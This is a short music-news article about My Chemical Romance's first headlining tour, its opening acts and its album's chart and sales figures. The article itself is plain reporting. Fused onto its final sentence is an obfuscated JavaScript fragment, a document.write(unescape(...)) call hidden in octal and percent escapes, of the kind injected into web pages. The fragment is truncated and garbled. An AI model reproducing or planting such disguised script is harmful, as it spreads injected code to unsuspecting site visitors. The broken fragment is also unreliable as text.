Although the full itinerary isn't finalized, breakout modern rock act My Chemical Romance will embark on its first headlining tour this fall, Billboard.com has learned. The Alkaline Trio and Reggie And The Full Effect will serve as the opening acts for the 28-city outing, news of which comes days after My Chemical Romance snagged four nominations for the 2005 MTV Video Music Awards.
The group will be touring in support of its 2004 Reprise debut "Three Cheers for Sweet Revenge," which reached No. 1 on Billboard's Heatseekers chart and has sold more than 826,000 copies in the United States, according to Nielsen SoundScan. The singles "I'm Not Okay (I Promise)" and "Helena (So Long & Goodnight)" peaked at No. 4 and No. 11 respectively on Billboard's Modern Rock chart.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
